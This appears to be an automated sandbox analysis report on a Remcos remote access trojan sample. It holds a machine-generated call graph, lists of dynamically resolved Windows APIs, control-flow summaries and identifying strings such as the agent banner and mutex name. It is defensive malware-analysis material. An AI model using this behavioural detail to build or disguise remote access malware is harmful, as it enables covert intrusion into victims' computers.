85699 4027ec 28 API calls 85249->85699 85700 404468 59 API calls _Yarn 85249->85700 85701 4045d5 111 API calls ___std_exception_copy 85249->85701 85702 40a767 84 API calls 85249->85702 85251 4144ed GetTickCount 85250->85251 85695 41ad46 28 API calls 85251->85695 85254->85249 85256->85249 85259->85249 85260->85249 85261->85249 85263->85249 85264->85249 85267->85249 85268->85249 85269->85249 85727 419e89 103 API calls 85269->85727 85270->84704 85271->84714 85274 4085c0 85273->85274 85275 402e78 28 API calls 85274->85275 85276 4085e4 85275->85276 85276->84735 85278 4124e1 RegQueryValueExA RegCloseKey 85277->85278 85279 41250b 85277->85279 85278->85279 85279->84731 85280->84738 85281->84767 85282->84760 85283->84751 85284->84765 85286 40c8ba 85285->85286 85287 40c8da 85286->85287 85288 40c90f 85286->85288 85290 40c8d0 85286->85290 85728 41a74b 29 API calls 85287->85728 85291 41b15b 2 API calls 85288->85291 85289 40ca03 GetLongPathNameW 85293 403b40 28 API calls 85289->85293 85290->85289 85294 40c914 85291->85294 85296 40ca18 85293->85296 85297 40c918 85294->85297 85298 40c96a 85294->85298 85295 40c8e3 85299 401e18 26 API calls 85295->85299 85300 403b40 28 API calls 85296->85300 85302 403b40 28 API calls 85297->85302 85301 403b40 28 API calls 85298->85301 85303 40c8ed 85299->85303 85304 40ca27 85300->85304 85305 40c978 85301->85305 85306 40c926 85302->85306 85307 401e13 26 API calls 85303->85307 85731 40cc37 28 API calls 85304->85731 85311 403b40 28 API calls 85305->85311 85312 403b40 28 API calls 85306->85312 85307->85290 85309 40ca3a 85732 402860 28 API calls 85309->85732 85314 40c98e 85311->85314 85315 40c93c 85312->85315 85313 40ca45 85733 402860 28 API calls 85313->85733 85730 402860 28 API calls 85314->85730 85729 402860 28 API calls 85315->85729 85319 40ca4f 85323 401e13 26 API calls 85319->85323 85320 40c999 85324 401e18 26 API calls 85320->85324 85321 40c947 85322 401e18 26 API calls 85321->85322 85326 40c952 85322->85326 85327 40ca59 85323->85327 85325 40c9a4 85324->85325 85328 401e13 26 API calls 85325->85328 85329 401e13 26 API calls 85326->85329 85330 401e13 26 API calls 85327->85330 85332 40c9ad 85328->85332 85333 40c95b 85329->85333 85331 40ca62 85330->85331 85334 401e13 26 API calls 85331->85334 85335 401e13 26 API calls 85332->85335 85336 401e13 26 API calls 85333->85336 85337 40ca6b 85334->85337 85335->85303 85336->85303 85338 401e13 26 API calls 85337->85338 85339 40ca74 85338->85339 85340 401e13 26 API calls 85339->85340 85341 40ca7d 85340->85341 85341->84813 85342->84826 85343->84847 85344->84806 85345->84840 85346->84876 85347->84885 85348->84909 85349->84897 85350->84931 85352 401e0c 85351->85352 85353->84758 85356 40e183 85355->85356 85357 41a65c LoadResource LockResource SizeofResource 85355->85357 85356->84987 85357->85356 85359 401f8e 85358->85359 85360 402325 28 API calls 85359->85360 85361 401fa4 85360->85361 85361->84991 85363 401f86 28 API calls 85362->85363 85364 406066 85363->85364 85364->84998 85366 40250d 85365->85366 85368 40252b 85366->85368 85369 40261a 28 API calls 85366->85369 85368->85002 85369->85368 85370->85004 85372 41bfae 85371->85372 85373 41bfd2 85372->85373 85374 41bfcb 85372->85374 85379 41c552 85373->85379 85398 41bfe3 28 API calls 85374->85398 85376 41bfd0 85376->85004 85378->85013 85380 41c55c __EH_prolog 85379->85380 85381 41c673 85380->85381 85382 41c595 85380->85382 85405 402649 28 API calls std::_Xinvalid_argument 85381->85405 85399 4026a7 28 API calls 85382->85399 85386 41c5a9 85400 41c536 28 API calls 85386->85400 85388 41c5dc 85389 41c603 85388->85389 85390 41c5f7 85388->85390 85402 41c7cf 26 API calls 85389->85402 85401 41c7b2 26 API calls 85390->85401 85393 41c601 85404 41c75a 26 API calls 85393->85404 85394 41c60f 85403 41c7cf 26 API calls 85394->85403 85397 41c63e 85397->85376 85398->85376 85399->85386 85400->85388 85401->85393 85402->85394 85403->85393 85404->85397 85406->85027 85407->85031 85408->85033 85411 402e85 85410->85411 85412 402e98 85411->85412 85414 402eae 85411->85414 85415 402ea9 85411->85415 85417 403445 28 API calls 85412->85417 85414->85415 85418 40225b 26 API calls 85414->85418 85415->85042 85417->85415 85418->85415 85420 404bd0 85419->85420 85423 40245c 85420->85423 85422 404be4 85422->85045 85424 402469 85423->85424 85426 402478 85424->85426 85427 402ad3 28 API calls 85424->85427 85426->85422 85427->85426 85428->85049 85430 401e94 85429->85430 85432 41b183 85431->85432 85433 41b168 GetCurrentProcess IsWow64Process 85431->85433 85432->85059 85433->85432 85434 41b17f 85433->85434 85434->85059 85436 412541 RegQueryValueExA RegCloseKey 85435->85436 85437 412569 85435->85437 85436->85437 85438 401f66 28 API calls 85437->85438 85439 41257e 85438->85439 85439->85062 85440->85070 85441->85081 85460 43a545 85442->85460 85444 43998b 85469 4392de 38 API calls 2 library calls 85444->85469 85446 439950 85446->85444 85447 439965 85446->85447 85459 40dd54 85446->85459 85467 445354 20 API calls __dosmaperr 85447->85467 85449 43996a 85468 43a827 26 API calls _Deallocate 85449->85468 85452 439997 85453 4399c6 85452->85453 85470 43a58a 42 API calls __Toupper 85452->85470 85455 439a32 85453->85455 85471 43a4f1 26 API calls 2 library calls 85453->85471 85472 43a4f1 26 API calls 2 library calls 85455->85472 85457 439af9 _swprintf 85457->85459 85473 445354 20 API calls __dosmaperr 85457->85473 85459->84833 85459->84835 85461 43a54a 85460->85461 85462 43a55d 85460->85462 85474 445354 20 API calls __dosmaperr 85461->85474 85462->85446 85464 43a54f 85475 43a827 26 API calls _Deallocate 85464->85475 85466 43a55a 85466->85446 85467->85449 85468->85459 85469->85452 85470->85452 85471->85455 85472->85457 85473->85459 85474->85464 85475->85466 85480 401e9b 85476->85480 85478 4027d9 85478->85114 85479->85118 85481 401ea7 85480->85481 85482 40245c 28 API calls 85481->85482 85483 401eb9 85482->85483 85483->85478 85485 409855 85484->85485 85486 4124b7 3 API calls 85485->85486 85487 40985c 85486->85487 85488 409870 85487->85488 85489 40988a 85487->85489 85490 4095cf 85488->85490 85491 409875 85488->85491 85492 4082dc 28 API calls 85489->85492 85490->84870 85503 4082dc 85491->85503 85494 409898 85492->85494 85508 4098a5 85 API calls 85494->85508 85498 409888 85498->85490 85499->85144 85517 402d8b 85500->85517 85502 4028dd 85502->85147 85504 4082eb 85503->85504 85509 408431 85504->85509 85506 408309 85507 409959 29 API calls 85506->85507 85507->85498 85514 40999f 130 API calls 85507->85514 85508->85490 85515 4099b5 53 API calls 85508->85515 85516 4099a9 125 API calls 85508->85516 85510 40843d 85509->85510 85512 40845b 85510->85512 85513 402f0d 28 API calls 85510->85513 85512->85506 85513->85512 85518 402d97 85517->85518 85521 4030f7 85518->85521 85520 402dab 85520->85502 85522 403101 85521->85522 85524 403115 85522->85524 85525 4036c2 28 API calls 85522->85525 85524->85520 85525->85524 85527 403b48 85526->85527 85533 403b7a 85527->85533 85530 403cbb 85542 403dc2 85530->85542 85532 403cc9 85532->85155 85534 403b86 85533->85534 85537 403b9e 85534->85537 85536 403b5a 85536->85530 85538 403ba8 85537->85538 85539 403bb3 85538->85539 85541 403cfd 28 API calls 85538->85541 85539->85536 85541->85539 85543 403dce 85542->85543 85546 402ffd 85543->85546 85545 403de3 85545->85532 85547 40300e 85546->85547 85552 4032a4 85547->85552 85551 40302e 85551->85545 85553 4032b0 85552->85553 85554 40301a 85552->85554 85558 4032b6 28 API calls 85553->85558 85554->85551 85557 4035e8 28 API calls 85554->85557 85557->85551 85565 4395ba 85559->85565 85563 412814 85562->85563 85564 4127ed RegSetValueExA RegCloseKey 85562->85564 85563->85181 85564->85563 85568 43953b 85565->85568 85567 401608 85567->85179 85569 43954a 85568->85569 85570 43955e 85568->85570 85576 445354 20 API calls __dosmaperr 85569->85576 85575 43955a __alldvrm 85570->85575 85578 447601 11 API calls 2 library calls 85570->85578 85572 43954f 85577 43a827 26 API calls _Deallocate 85572->85577 85575->85567 85576->85572 85577->85575 85578->85575 85582 41aab9 _Yarn ___scrt_fastfail 85579->85582 85580 401f66 28 API calls 85581 41ab2e 85580->85581 85581->85185 85582->85580 85583->85201 85585 413fb3 WSASetLastError 85584->85585 85586 413fa9 85584->85586 85585->85228 85703 413e37 35 API calls ___std_exception_copy 85586->85703 85588 413fae 85588->85585 85591 404206 socket 85590->85591 85592 4041fd 85590->85592 85594 404220 85591->85594 85595 404224 CreateEventW 85591->85595 85704 404262 WSAStartup 85592->85704 85594->85228 85595->85228 85596 404202 85596->85591 85596->85594 85598 4049b1 85597->85598 85599 40492a 85597->85599 85598->85228 85600 404933 85599->85600 85601 404987 CreateEventA CreateThread 85599->85601 85602 404942 GetLocalTime 85599->85602 85600->85601 85601->85598 85707 404b1d 85601->85707 85705 41ad46 28 API calls 85602->85705 85604 40495b 85706 404c9e 28 API calls 85604->85706 85606 404968 85607 401f66 28 API calls 85606->85607 85608 404977 85607->85608 85609 41a686 79 API calls 85608->85609 85610 40497c 85609->85610 85611 401eea 26 API calls 85610->85611 85611->85601 85613 4043e1 85612->85613 85614 4042b3 85612->85614 85615 404343 85613->85615 85616 4043e7 WSAGetLastError 85613->85616 85614->85615 85617 4042e8 85614->85617 85622 404cbf 28 API calls 85614->85622 85615->85228 85616->85615 85618 4043f7 85616->85618 85711 420151 27 API calls 85617->85711 85619 4042f7 85618->85619 85620 4043fc 85618->85620 85629 401f66 28 API calls 85619->85629 85722 41bc76 30 API calls 85620->85722 85625 4042d4 85622->85625 85624 4042f0 85624->85619 85628 404306 85624->85628 85626 401f66 28 API calls 85625->85626 85630 4042e3 85626->85630 85627 40440b 85723 404c9e 28 API calls 85627->85723 85638 404315 85628->85638 85639 40434c 85628->85639 85632 404448 85629->85632 85633 41a686 79 API calls 85630->85633 85635 401f66 28 API calls 85632->85635 85633->85617 85634 404418 85637 401f66 28 API calls 85634->85637 85636 404457 85635->85636 85640 41a686 79 API calls 85636->85640 85641 404427 85637->85641 85643 401f66 28 API calls 85638->85643 85719 420f34 55 API calls 85639->85719 85640->85615 85644 41a686 79 API calls 85641->85644 85646 404324 85643->85646 85647 40442c 85644->85647 85645 404354 85648 404389 85645->85648 85649 404359 85645->85649 85650 401f66 28 API calls 85646->85650 85652 401eea 26 API calls 85647->85652 85721 4202ea 28 API calls 85648->85721 85653 401f66 28 API calls 85649->85653 85654 404333 85650->85654 85652->85615 85657 404368 85653->85657 85655 41a686 79 API calls 85654->85655 85658 404338 85655->85658 85656 404391 85659 4043be CreateEventW CreateEventW 85656->85659 85661 401f66 28 API calls 85656->85661 85660 401f66 28 API calls 85657->85660 85712 420191 85658->85712 85659->85615 85662 404377 85660->85662 85664 4043a7 85661->85664 85665 41a686 79 API calls 85662->85665 85666 401f66 28 API calls 85664->85666 85667 40437c 85665->85667 85668 4043b6 85666->85668 85720 420592 53 API calls 85667->85720 85670 41a686 79 API calls 85668->85670 85671 4043bb 85670->85671 85671->85659 85672->85228 85673->85228 85675 404805 SetEvent CloseHandle 85674->85675 85676 40481c closesocket 85674->85676 85677 40489c 85675->85677 85678 404829 85676->85678 85677->85228 85679 404838 85678->85679 85680 40483f 85678->85680 85726 404ab1 83 API calls 85679->85726 85682 404851 WaitForSingleObject 85680->85682 85683 404892 SetEvent CloseHandle 85680->85683 85684 420191 3 API calls 85682->85684 85683->85677 85685 404860 SetEvent WaitForSingleObject 85684->85685 85686 420191 3 API calls 85685->85686 85687 404878 SetEvent CloseHandle CloseHandle 85686->85687 85687->85683 85688->85228 85689->85228 85690->85228 85691->85228 85692->85228 85693->85249 85694->85249 85695->85249 85696->85249 85697->85249 85698->85249 85699->85249 85700->85249 85701->85249 85702->85249 85703->85588 85704->85596 85705->85604 85706->85606 85710 404b29 101 API calls 85707->85710 85709 404b26 85710->85709 85711->85624 85713 420199 85712->85713 85715 41dc15 85712->85715 85713->85615 85714 41dc23 85725 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 85714->85725 85715->85714 85724 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 85715->85724 85718 41dc2a 85719->85645 85720->85658 85721->85656 85722->85627 85723->85634 85724->85714 85725->85718 85726->85680 85728->85295 85729->85321 85730->85320 85731->85309 85732->85313 85733->85319 85736 40e56a 85734->85736 85735 4124b7 3 API calls 85735->85736 85736->85735 85737 40e60e 85736->85737 85739 40e5fe Sleep 85736->85739 85756 40e59c 85736->85756 85740 4082dc 28 API calls 85737->85740 85738 4082dc 28 API calls 85738->85756 85739->85736 85743 40e619 85740->85743 85742 41ae08 28 API calls 85742->85756 85744 41ae08 28 API calls 85743->85744 85745 40e625 85744->85745 85769 412774 29 API calls 85745->85769 85748 401e13 26 API calls 85748->85756 85749 40e638 85750 401e13 26 API calls 85749->85750 85752 40e644 85750->85752 85751 401f66 28 API calls 85751->85756 85753 401f66 28 API calls 85752->85753 85754 40e655 85753->85754 85757 4126d2 29 API calls 85754->85757 85755 4126d2 29 API calls 85755->85756 85756->85738 85756->85739 85756->85742 85756->85748 85756->85751 85756->85755 85767 40bf04 73 API calls ___scrt_fastfail 85756->85767 85768 412774 29 API calls 85756->85768 85758 40e668 85757->85758 85770 411699 TerminateProcess WaitForSingleObject 85758->85770 85760 40e670 ExitProcess 85771 411637 60 API calls 85762->85771 85768->85756 85769->85749 85770->85760

                                                                                Executed Functions

                                                                                Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                • API String ID: 384173800-625181639
                                                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 103->108 109 40d9db call 40697b 103->109 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 170->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 189->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 197->203 198->203 258 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->258 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 258->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 258->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 399 40e022-40e025 395->399 400 40e033-40e038 395->400 396->395 401 40e073-40e08e call 401e8f call 41246e 399->401 402 40e027-40e031 399->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 400->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                APIs
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000104), ref: 0040D790
                                                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-GJDISH$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                • API String ID: 2830904901-310086955
                                                                                • Opcode ID: 23bab16b0a32835fc41408796fbaf142d12239376e5a44b2dd1f76423c1949f1
                                                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                • Opcode Fuzzy Hash: 23bab16b0a32835fc41408796fbaf142d12239376e5a44b2dd1f76423c1949f1
                                                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
